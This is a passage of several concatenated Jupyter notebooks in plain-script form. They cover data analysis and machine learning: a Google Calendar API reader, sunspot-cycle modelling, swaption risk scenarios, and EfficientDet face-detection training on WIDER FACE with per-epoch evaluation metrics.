',csr.nbytes,' storage ratio: ', csr.nbytes/dense.nbytes) print('no. bytes csc: ',csc.nbytes,' storage ratio: ', csc.nbytes/dense.nbytes)
examples.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Applied-Data-Analytics # language: python # name: applied-data-analytics # --- import pandas as pd df = pd.read_csv("/Users/user/Documents/GitHub/Applied-Data-Analytics/Datasets/heights.csv") df df.hist(bins=17)
Chapter01/Activity1.01/Activity1.01.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .jl # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Julia 0.5.0 # language: julia # name: julia-0.5 # --- # # Example 1 of the "The GMT/MATLAB Toolbox" <NAME>. # DOI 10.1002/2016GC006723 # # # Gridding # This example illustrates the gridding of ship track bathymetry near the Geologists seamounts southwest of Hawaii via robust, median-based averaging followed by gridding using a minimum curvature spline in tension algorithm. The following commands assume the data file, a simple (x y z) ascii file resides in current directory. # The result is visualized with the PyPlot backend of the Plots.jl package. While this is a simple example, we note that the blockmedian and surface combination powers the creation of many global data sets and that our gridding module surface is widely used across all sciences. # Read in the point data. using GMT # Read in the point data. geo = gmt("read -Td geologists.txt"); # Now decimate data using median spatial averaging on a 1 arc min lattice ave = gmt("blockmedian -R158:00W/156:40W/18:00N/19:40N -I1m", geo); # Grid the data using splines in tension G = gmt("surface -R -I1m -T0.2", ave); # Plot the result with Plots using Plots contour(G.x, G.y, G.z, aspect_ratio="equal") scatter!(ave[1].data[:,1], ave[1].data[:,2], markersize=0.5, marker=:cross) surface(G.x, G.y, -G.z, title="Geologists Seamounts")
WL_example_I.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + pycharm={"is_executing": false} from gs_quant.session import Environment, GsSession from gs_quant.instrument import IRSwaption from gs_quant.risk import CurveScenario, MarketDataPattern from gs_quant.markets import MarketDataCoordinate import matplotlib.pyplot as plt import pandas as pd # - # external users should substitute their client id and secret; please skip this step if using internal jupyterhub GsSession.use(Environment.PROD, client_id=None, client_secret=None, scopes=('run_analytics',)) # + pycharm={"name": "#%%\n"} swaption = IRSwaption('Receive', '5y', 'USD', expiration_date='13m', strike='atm') swaption.resolve() # - original_price = swaption.price() market_data = swaption.market().market_data_dict print('Base price: {:,.2f}'.format(original_price)) # + pycharm={"name": "#%%\n"} # Price the swaption under a curve move of 10bp parallel shift parallel_shift_scenario = CurveScenario(market_data_pattern=MarketDataPattern('IR', 'USD'), parallel_shift=10) with parallel_shift_scenario: swaption_parallel_shift = swaption.price() market_data_parallel_shift = swaption.market().market_data_dict print('Price under parallel shift: {:,.2f}'.format(swaption_parallel_shift)) # - # Compare swap rate market data coordinates before and after curve scenario shock coord = MarketDataCoordinate(mkt_type="IR",mkt_asset="USD") market_data_df = pd.DataFrame([{mkt_data.coordinate: mkt_data.value * 1e4 for mkt_data in market_data if (mkt_data.coordinate.mkt_type=="IR" and mkt_data.coordinate.mkt_class=="SWAP")}, {mkt_data.coordinate: mkt_data.value * 1e4 for mkt_data in market_data_parallel_shift if (mkt_data.coordinate.mkt_type=="IR" and mkt_data.coordinate.mkt_class=="SWAP")}], index=['Values', 'Shocked values']).transpose() market_data_df # + # Plotting swap rate market data before and after curve scenario shock swap_curve = pd.DataFrame.from_dict({int(''.join(list(filter(str.isdigit, str(v))))): market_data_df.loc[v] for v in market_data_df.index}, orient='index') swap_curve['Shock'] = swap_curve['Shocked values'] - swap_curve['Values'] swap_curve.plot(figsize=(12, 8), title='USD Swap Curve Before and After Parallel Shock') plt.xlabel('Tenor (years)') plt.ylabel('bp')
gs_quant/documentation/02_pricing_and_risk/01_scenarios_and_contexts/examples/04_curve_shock/010400_parallel_curve_shock.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + import numpy as np import keras from keras.datasets import mnist from keras import backend as K from random import randrange num_classes = 10 # input image dimensions img_rows, img_cols = 28, 28 # the data, split between train and test sets (x_train, y_train), (x_test, y_test) = mnist.load_data() if K.image_data_format() == 'channels_first': x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols) x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols) input_shape = (1, img_rows, img_cols) else: x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1) x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1) input_shape = (img_rows, img_cols, 1) x_train = x_train.astype('float32') x_test = x_test.astype('float32') x_train /= 255 x_test /= 255 # convert class vectors to binary class matrices y_train = keras.utils.to_categorical(y_train, num_classes) y_test = keras.utils.to_categorical(y_test, num_classes) # - print(x_test.shape) print(y_test.shape) #print(x_test[0][0][0] # write test data x into folder for later usage for num in range(10000): fo = open("test_data_x/test_data_x_"+str(num)+".txt", "w") for i in range(28): for j in range(28): fo.write(str(x_test[num][i][j][0])+'\n') fo.close() # write test data y into folder for later usage for num in range(10000): fo = open("test_data_y/test_data_y_"+str(num)+".txt","w") for i in range(10): fo.write(str(y_test[num][i])+'\n') fo.close()
pynq_interface_code/get_test_data.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + #ClientID #713695703931-96evkgsumethcakcjq8bmte1blrafv9m.apps.googleusercontent.com #ClientSecret <KEY> from __future__ import print_function import datetime import pickle import os.path from googleapiclient.discovery import build from google_auth_oauthlib.flow import InstalledAppFlow from google.auth.transport.requests import Request # If modifying these scopes, delete the file token.pickle. SCOPES = ['https://www.googleapis.com/auth/calendar.readonly'] """Shows basic usage of the Google Calendar API. Prints the start and name of the next 10 events on the user's calendar. """ creds = None # The file token.pickle stores the user's access and refresh tokens, and is # created automatically when the authorization flow completes for the first # time. if os.path.exists('token.pickle'): with open('token.pickle', 'rb') as token: creds = pickle.load(token) # If there are no (valid) credentials available, let the user log in. if not creds or not creds.valid: if creds and creds.expired and creds.refresh_token: creds.refresh(Request()) else: flow = InstalledAppFlow.from_client_secrets_file( 'credentials.json', SCOPES) creds = flow.run_local_server(port=0) # Save the credentials for the next run with open('token.pickle', 'wb') as token: pickle.dump(creds, token) service = build('calendar', 'v3', credentials=creds) # Call the Calendar API now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time #print('Getting the upcoming 10 events') events_result = service.events().list(calendarId='<EMAIL>',#幻影戦争 #timeMin=now, #maxResults=5, #max10 singleEvents=True, orderBy='startTime').execute() events = events_result.get('items', []) if not events: print('No upcoming events found.') # - import pandas as pd df = pd.DataFrame(columns=['etag','eid','start','end','category','event']) df # + for event in events: eTag = event['etag'] eId = event['id'] start = event['start'].get('dateTime', event['start'].get('date')) end = event['end'].get('dateTime', event['end'].get('date')) try: category, event = event['summary'].split(":") except: category = 'その他' event = event['summary'] df = df.append({'etag':eTag, 'eid': eId,'start': start, 'end': end, 'category': category, 'event': event}, ignore_index=True) df['start'] = pd.to_datetime(df['start']) df['end'] = pd.to_datetime(df['end']) df = df.drop_duplicates() # - df starts = df.set_index(['start'])['2020-10-7':'2020-10-8'] ends = df.set_index(['end'])['2020-10-7':'2020-10-8'] def getSpan(_df, st, ed): #_df[(df['start'] > st) and (df['start'] < ed)] _df = _df[( (_df['start'] >= st) & (df['start'] <= ed) )|( (_df['end'] >= st) & (df['end'] <= ed) ) ] return _df getSpan(df, '2020-10-7','2020-10-8') df.drop_duplicates() df = df.drop_duplicates() import datetime datetime.datetime.today() dt = datetime.datetime.today() d_truncated = datetime.date(dt.year, dt.month, dt.day) d_truncated d_truncated + datetime.timedelta(days=1) d_truncated + datetime.timedelta(days=7) d_truncated + datetime.timedelta(days=-d_truncated.weekday(), weeks=1) # d_truncated + datetime.timedelta(days=-d_truncated.day, months=1) help(d_truncated.weekday) d_truncated.day # d_truncated + relativedelta(day=1, months=1) from dateutil.relativedelta import relativedelta for index, row in df.iterrows(): print(row['start'].strftime('%Y/%m/%d %H') + "' - " + row['end'].strftime('%Y/%m/%d %H') + "'" + " " + row['event']) from calender import getCalender, getNextMonthCal, getCol, getEventsDf # + msg = "test" msgcontent = "!カレンダ 来月" msg,df = getCalender(msg, msgcontent) # - df getNextMonthCal() dt = datetime.datetime.today() start = datetime.date(dt.year, dt.month, dt.day) start = start + relativedelta(day=1, months=1) end = start + relativedelta(day=1, months=2) #print(dt, start, end) df = getCol(start, end) df dt = datetime.datetime.today() start = datetime.date(dt.year, dt.month, dt.day) end = start + relativedelta(day=1, months=1) df = getCol(start, end) #print(dt, start, end) df # 翌週 dt = datetime.datetime.today() start = datetime.date(dt.year, dt.month, dt.day) end = start + datetime.timedelta(days=-start.weekday(), weeks=2) start = start + datetime.timedelta(days=-start.weekday(), weeks=1) df = getCol(start, end) df dt = datetime.datetime.today() start = datetime.date(dt.year, dt.month, dt.day) end = start + datetime.timedelta(days=1) df = getCol(start, end) def getSpanDf(df, start, end): st = start.strftime('%Y/%m/%d %H:%M:%S') ed = end.strftime('%Y/%m/%d %H:%M:%S') print(st, ed) df = df[ ((ed > df['start']) & (ed < df['end']))| ((st > df['start']) & (ed < df['end']))| ((st > df['start']) & (st < df['end']))| ((df['start'] > st) & (df['end'] < ed)) ] return df dt = datetime.datetime.today() start = datetime.date(dt.year, dt.month, dt.day) start = start + relativedelta(day=1, months=1) end = start + relativedelta(day=1, months=2) #print(dt, start, end) df = getCol(start, end) df df getEventsDf()
calender.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Load our data in and take a look at both the raw data and also visualize it import pandas as pd import matplotlib.pyplot as plt import numpy as np # + silsoJD = pd.read_csv('./sunspot_data/SILSO_daily_inJD.txt', delimiter='\s+', usecols=[0,1,2,3,4], skiprows=1) silsoJD.columns = ['JD', 'SSN', 'std', 'observations', 'definitive indicator'] # - silsoJD # + plt.figure(figsize=(20,10)) plt.title('WDC-SILSO sunspot numbers 1818-2020') plt.scatter(range(len(silsoJD['SSN'])), silsoJD['SSN'], s=4) #note: value of -1 means no data collected that day. need to cut out # - # ## Take care of that note and clean it up, doesn't really make much of a difference but we'll be thorough anyway cleaned_data = silsoJD['SSN'].replace(-1.0, np.nan) dates = [date for date in range(len(silsoJD['SSN']))] # ## Some naive guesses at what a model might look like, keep tweaking and adding sine functions until something is reasonable enough to move forward with # + #convert to degrees for np.sin because it makes more sense in my head dates_deg = [date*np.pi/180 for date in dates] period1 = (len(dates)/360) / 18.33 #number of periods (in degrees) divided by how many i counted by eye phase1 = np.pi - np.arcsin(0.25) #around where the function starts (back to radians because i hate myself) func1arg = [date/period1 + phase1 for date in dates_deg] period2 = (len(dates)/360) / 1.75 phase2 = np.arcsin(0.25) func2arg = [date/period2 + phase2 for date in dates_deg] #units are counts amplitude1 = 180 amplitude2 = 60 offset1 = 70 offset2 = 70 function1 = (amplitude1 * (np.sin(func1arg)) + offset1) function2 = (amplitude2 * (np.sin(func2arg)) + offset2) total_function = (function1 + function2) + silsoJD['std'] total_function[total_function <0] = 0 # - fig = plt.figure(figsize=(20,10)) plt.title('WDC-SILSO sunspot numbers 1818-2020') plt.xticks(np.arange(0, len(dates), 11*360), labels=np.arange(1818,2020, 11)) plt.xlim(-1000, len(dates)+1000) plt.scatter(dates, cleaned_data, s=4, alpha=0.5) plt.plot(dates, function1, c='g', ls='--', linewidth=5) plt.plot(dates, function2, c='r', ls='--', linewidth=5) plt.plot(dates, total_function, c='k', linewidth=3) # ### Here's what a model for this probably looks like: # # $$ # SSN(t) = \left(A_1\! \sin(B_1t + C_1) + D_1\right) \ + \ \left(A_2\! \sin(B_2t + C_2) + D_2\right) \ + \ ... # $$ # # Where $A$ is amplitude, $B$ is period, $C$ is our phase shift, and $D$ is our displacement. For this project, we'll only focus on the 2 obvious cycles in this data: the commonly known ~11 year cycle, and what appears to be a cycle of around 115 years. Evidence suggests longer cycles such as: # # - The 210 year Suess cycle # - The ~2,400 year Hallstatt cycle # - Cycles of various years including (105, 131, 232, 385, etc.) # - Unnamed cycle of possibly >6,000 years # # A lot of these cycles look at radiocarbon dating, and geological observations. We're only dealing with recorded sunspot numbers from visual observations from the past 200 years so it isn't prudent to consider them for this modeling. # # ## That being said, now we can make a Metropolis-Hastings code to sample our functions and have that come up with a better fit...........maybe # # + #create our model def ssn_model(A1, B1, C1, D1, A2, B2, C2, D2, timeseries): arg1 = [date/B1 + C1 for date in timeseries] sine1 = A1 * np.sin(arg1) + D1 arg2 = [date/B2 + C2 for date in timeseries] sine2 = A2 * np.sin(arg2) + D2 return sine1 + sine2 #for posterity's sake, we'll copy G's HW4 solution of visualizing how changing each parameter affects the overall structure #i already spent time doing this by hand above to fine tune parameters, but this will be good to show for others #LOOK AT YOUR DATA! datestest = np.arange(0,2*np.pi,.01) atest1 = 10 atest2 = 5 btest1 = (len(datestest)/360) / 18.33 btest2 = (len(datestest)/360) / 1.75 ctest1 = np.pi - np.arcsin(0.25) ctest2 = np.arcsin(0.25) dtest1 = 70 dtest2 = 70 fig, axs = plt.subplots(nrows=2, ncols=4, sharex=False, figsize=(20, 8)) ax1, ax2, ax3, ax4 = axs[0] ax5, ax6, ax7, ax8 = axs[1] for A1x in [90, 180, 270]: ax1.plot(datestest, ssn_model(A1x, btest1, ctest1, dtest1, atest2, btest2, ctest2, dtest2, datestest), label=f'Amplitude={A1x:.1f}') ax1.legend(frameon=False) ax1.set_xlabel('t') ax1.set_ylabel('SSN') ax1.set_title('Varying Amplitude 1') for B1x in [(len(datestest)/360)/5, (len(datestest)/360)/15, (len(datestest)/360)/25]: ax2.plot(datestest, ssn_model(atest1, B1x, ctest1, dtest1, atest2, btest2, ctest2, dtest2, datestest), label=f'Amplitude={B1x:.1f}') ax2.legend(frameon=False) ax2.set_xlabel('t') ax2.set_ylabel('SSN') ax2.set_title('Varying Period 1') for C1x in [np.pi - np.arcsin(0), np.pi - np.arcsin(0.5), np.pi - np.arcsin(1)]: ax3.plot(datestest, ssn_model(atest1, btest1, C1x, dtest1, atest2, btest2, ctest2, dtest2, datestest), label=f'Amplitude={C1x:.1f}') ax3.legend(frameon=False) ax3.set_xlabel('t') ax3.set_ylabel('SSN') ax3.set_title('Varying Phase 1') for D1x in [0, 20, 40]: ax4.plot(datestest, ssn_model(atest1, btest1, ctest1, D1x, atest2, btest2, ctest2, dtest2, datestest), label=f'Amplitude={D1x:.1f}') ax4.legend(frameon=False) ax4.set_xlabel('t') ax4.set_ylabel('SSN') ax4.set_title('Varying Offset 1') for A2x in [20, 60, 100]: ax5.plot(datestest, ssn_model(atest1, btest1, ctest1, dtest1, A2x, btest2, ctest2, dtest2, datestest), label=f'Amplitude={A2x:.1f}') ax5.legend(frameon=False) ax5.set_xlabel('t') ax5.set_ylabel('SSN') ax5.set_title('Varying Amplitude 2') for B2x in [(len(datestest)/360)/1, (len(datestest)/360)/1.75, (len(datestest)/360)/3]: ax6.plot(datestest, ssn_model(atest1, btest1, ctest1, dtest1, atest2, B2x, ctest2, dtest2, datestest), label=f'Amplitude={B2x:.1f}') ax6.legend(frameon=False) ax6.set_xlabel('t') ax6.set_ylabel('SSN') ax6.set_title('Varying Period 2') for C2x in [np.arcsin(0), np.arcsin(0.25), np.arcsin(0.5)]: ax7.plot(datestest, ssn_model(atest1, btest1, ctest1, dtest1, atest2, btest2, C2x, dtest2, datestest), label=f'Amplitude={C2x:.1f}') ax7.legend(frameon=False) ax7.set_xlabel('t') ax7.set_ylabel('SSN') ax7.set_title('Varying Phase 2') for D2x in [0, 20, 40]: ax8.plot(datestest, ssn_model(atest1, btest1, ctest1, dtest1, atest2, btest2, ctest2, D2x, datestest), label=f'Amplitude={D2x:.1f}') ax8.legend(frameon=False) ax8.set_xlabel('t') ax8.set_ylabel('SSN') ax8.set_title('Varying Offset 2') fig.tight_layout() # - # ### It's a little bit hectic there, but you can start to get the sense of what's happening overall. In the nonvaried parameters, function 1 is the smaller, faster function while function 2 is the function that takes place over a much larger period of time. Overlaying the 2 constituent sine functions might add more clarity of what's going on behind the scenes (go back to the proposed model over the actual data above), but it's also a lot more visual noise for already congested figures. # # ### Let's try out our MH now # + # we'll define a chisq function for scipy optimize def chisq(x, *args): I_0, p, tmax, tE = x t, y, dy = args mod = logmodel(I_0, p, tmax, tE, t) chisq = np.sum(((y - mod)**2.)/(dy**2.))/(len(t) -4) return chisq # and a log likelihood function for our Metropolis-Hastings implementation def LogLikelihood(I_0, p, tmax, tE, t, y, dy): x = (I_0, p, tmax, tE) args = (t, y, dy) negLogLike = chisq(x, *args) return -negLogLike/2. # we'll set some very loose bounds on each parameter bounds = [(16, 18), (0, 2), (2458400, 2458600), (10, 60)] # we need to pass the data to scipy.optimize args = (data['t'], data['y'], data['dy']) res = so.minimize(chisq, guess, args=args, bounds=bounds) print(res) # and we can use the Hessian inverse to set the step size for metropolis-hastings # this choice is good because it should ensure we sample the distribution well. sigmas = np.diag(res.hess_inv.todense())**0.5 print('Sigmas =', sigmas) # - # Further things that could be done: (Frank attempting Fourier component analysis?) # # -Refine our model. In reality, the period seems to vary from one cycle to another. Instead of it being in the form of # $$ # SSN(t) = \left(A_1\! \sin(B_1t + C_1) + D_1\right) \ + \ \left(A_2\! \sin(B_2t + C_2) + D_2\right) \ + \ ... # $$ # # a more accurate model might be a similar series but of finite lengths of time, instead of overarching periodic functions that last forever: # # $$ # SSN(t) = \left(A_1\! \sin(B_1(t_1 -t_2) + C_1) + D_1\right) \ + \ \left(A_2\! \sin(B_2(t_3-t_4) + C_2) + D_2\right) \ + \ ... # $$
chris_notebook.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="view-in-github" colab_type="text" # <a href="https://colab.research.google.com/github/DarekGit/automl/blob/master/efficientdet/faces_test_EfficientDet_D4.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # + [markdown] id="V8-yl-s-WKMG" # # Test of EfficientDet with Faces datasets # # # # <table align="left"><td> # <a target="_blank" href="https://github.com/DarekGit/automl/blob/master/efficientdet/faces_test_EfficientDet_D4.ipynb"> # <img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on github # </a> # </td><td> # <a target="_blank" href="https://github.com/DarekGit/automl/blob/master/efficientdet/faces_test_EfficientDet_D4.ipynb"> # <img width=32px src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a> # </td></table> # # <br><br><br><br><br><br> # # https://github.com/DarekGit/automl/tree/master/efficientdet # + [markdown] id="muwOCNHaq85j" # # 0. Install. # + [markdown] id="dggLVarNxxvC" # ## 0.1 Install package and download source code/image. # # # + id="t76-4tVYs0uX" colab={"base_uri": "https://localhost:8080/"} outputId="10873241-d35e-49ac-a1d0-4996e7401281" # !nvidia-smi # + id="e_OpaA_pWkvx" colab={"base_uri": "https://localhost:8080/"} outputId="f0b5fdff-2f05-4e19-9379-aea373ae240c" # OUTPUT_DIR on gdrive (Google Drive) or tmp import os output='gdrive' # @param gdrive for google drive if output == 'gdrive': from google.colab import drive drive.mount('/content/drive') OUTPUT_DIR = os.path.join("/content/drive/My Drive/", "tmp") os.makedirs(OUTPUT_DIR, exist_ok=True) else: OUTPUT_DIR = output # + id="hGL97-GXjSUw" #originally https://github.com/google/automl # %%capture #@title import os import sys import tensorflow.compat.v1 as tf # Download source code. if "efficientdet" not in os.getcwd(): # !git clone --depth 1 https://github.com/DarekGit/automl os.chdir('automl/efficientdet') sys.path.append('.') # !pip install -r requirements.txt # !pip install -U 'git+https://github.com/cocodataset/cocoapi.git#subdirectory=PythonAPI' else: # !git pull # + id="ro2qY4Mc304a" from PIL.Image import Image MODEL = 'efficientdet-d4' # @param def download(m): if m not in os.listdir(): # !wget https://storage.googleapis.com/cloud-tpu-checkpoints/efficientdet/coco/{m}.tar.gz # !tar zxf {m}.tar.gz ckpt_path = os.path.join(os.getcwd(), m) return ckpt_path # Download checkpoint. ckpt_path = download(MODEL) print('Use model in {}'.format(ckpt_path)) min_score_thresh = 0.35 #@param max_boxes_to_draw = 2000 #@param line_thickness = 2. #@param # + [markdown] id="6h2_QdGazeJy" # ## 0.2 Datasets download # + id="gV0wWy7_mO5s" #WiderFace datasets downwload import os def Wider_load(val=True,train=True,test=False): os.makedirs('WIDER/', exist_ok=True) if val: # #!gdown https://drive.google.com/uc?id=0B6eKvaijfFUDd3dIRmpvSk8tLUk # !gdown https://drive.google.com/uc?id=1-5A_pa_jDS7gk8mHVCBB7ApV5KN8jWDr -O WIDER/tempv.zip # !unzip -q WIDER/tempv.zip -d WIDER # !rm WIDER/tempv.zip if train: ### WIDER Face Training Images # #!gdown https://drive.google.com/uc?id=0B6eKvaijfFUDQUUwd21EckhUbWs # !gdown https://drive.google.com/uc?id=1-1iJfmXKYvAx9uLdRDX5W6HHG_KZv1jH -O WIDER/temptr.zip # !unzip -q WIDER/temptr.zip -d WIDER # !rm WIDER/temptr.zip if test: # #!gdown https://drive.google.com/uc?id=0B6eKvaijfFUDbW4tdGpaYjgzZkU # !gdown https://drive.google.com/uc?id=1tTpUJZEQMKDVxKT6100V5FwDuGX_8sDi -O WIDER/tempt.zip # !unzip -q WIDER/tempt.zip -d WIDER # !rm WIDER/tempt.zip ### Face annotations # !wget mmlab.ie.cuhk.edu.hk/projects/WIDERFace/support/bbx_annotation/wider_face_split.zip -O WIDER/tempa.zip # !unzip -q WIDER/tempa.zip -d WIDER # !rm WIDER/tempa.zip ### Examples and formats of the submissions # #!wget mmlab.ie.cuhk.edu.hk/projects/WIDERFace/support/example/Submission_example.zip Wider_load(val=True,train=True,test=False) # + id="I8weY1WwfPMZ" #Faces_DD dataset download - hi-res import json # !gdown 'https://drive.google.com/uc?export=download&id=1XwVm-2EMFdy9Zq39pKFr5UoSJvgTOm-7' # !unzip -oq Faces_DD.zip # !rm Faces_DD.zip # !gdown 'https://drive.google.com/uc?export=download&id=1gIIUK518Ft9zi3VDVQZLRVozI-Hkpgt2' -O Annotations.json # + [markdown] id="t6aiAixVPERo" # # 1. Training EfficientDet on WIDER FACE. # # # # + [markdown] id="r2mNo0dFzv0d" # ## 1.1 Data preparation # + id="dzS3ycPKPERt" # !mkdir tfrecord # !PYTHONPATH=".:$PYTHONPATH" python dataset/create_wider_tfrecord.py \ # --data_dir='' --output_path=tfrecord/wider # + id="L0WKd7H-PER2" colab={"base_uri": "https://localhost:8080/"} outputId="e450bd61-b22e-49a7-ec21-c0c7af539d64" # WiderFace has 12880 train images with 40 shards epoch, here we use a single shard # for demo, but users should use all shards pascal-*-of-00100.tfrecord. file_pattern = 'wider_train-*-of-00040.tfrecord' # @param file_pattern_v = 'wider_val-*-of-00040.tfrecord' # @param images_per_epoch = 322 * len(tf.io.gfile.glob('tfrecord/' + file_pattern)) images_per_epoch = images_per_epoch // 8*8 # round to 8. print('images_per_epoch = {}'.format(images_per_epoch)) # + id="VRNaEvZdRo7i" colab={"base_uri": "https://localhost:8080/"} outputId="7f4b9286-dce5-4e67-fdc9-6ee5d6c4b26c" # OUTPUT_DIR on gdrive (Google Drive) or tmp output='gdrive' # @param gdrive for google drive if output == 'gdrive': from google.colab import drive drive.mount('/content/drive') OUTPUT_DIR = os.path.join("/content/drive/My Drive/", "tmp") os.makedirs(OUTPUT_DIR, exist_ok=True) else: OUTPUT_DIR = output # + [markdown] id="j6rRBB7Iz5dL" # ## 1.2 Training # + id="1OtZrjqdPER4" # generating train tfrecord is large, so we skip the execution here. # 2h per epoch on TESLA V100 import os if MODEL not in os.listdir(): # !wget https://storage.googleapis.com/cloud-tpu-checkpoints/efficientdet/coco/{MODEL}.tar.gz # !tar xf {MODEL}.tar.gz os.makedirs(OUTPUT_DIR+'/model_dir/', exist_ok=True) train_batch_size=2 # @param num_epochs=200 # @param # key option: use --ckpt rather than --backbone_ckpt. # !python main.py --mode=train_and_eval \ # --training_file_pattern=tfrecord/{file_pattern} \ # --validation_file_pattern=tfrecord/{file_pattern_v} \ # --model_name={MODEL} --ckpt={MODEL} \ # --model_dir='{OUTPUT_DIR}/model_dir/{MODEL}-finetune' \ # --train_batch_size={train_batch_size} \ # --eval_batch_size=2 --eval_samples=3224 \ # --num_epochs={num_epochs} \ # --num_examples_per_epoch={images_per_epoch} \ # --save_checkpoints_steps=3220 \ # --iterations_per_loop=400 \ # --hparams="num_classes=2,moving_average_decay=0, \ # mixed_precision=false, \ # max_instances_per_image=2000, \ # first_lr_drop_epoch=75.0, \ # second_lr_drop_epoch=125.0" # + [markdown] id="kCW0peYxUy9F" # Results after 1. epoch # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.264 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.504 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.258 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.128 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.563 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.668 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.055 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.197 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.319 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.189 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.637 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.748 # ``` # + [markdown] id="s_9TjanSh5uV" # Results after 2. epoch # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.273 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.512 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.274 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.129 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.597 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.686 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.056 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.204 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.324 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.188 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.665 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.758 # ``` # # + [markdown] id="f9Q_kmScKNwc" # Results after 6. epoch # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.313 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.575 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.311 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.173 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.618 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.697 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.058 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.219 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.369 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.243 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.683 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.770 # ``` # # + [markdown] id="C_-4pH9yv5Qt" # Results after 9 epochs # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.320 # Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.590 # Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.318 # Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.183 # Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.621 # Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.713 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.059 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.219 # Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.372 # Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.244 # Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.688 # Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.782 # ``` # # + [markdown] id="noCFx46okNfH" # *Results* after **13 epochs** # # ``` # Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.336 # Average Precision (AP) @[ IoU=0.50 | area= all | 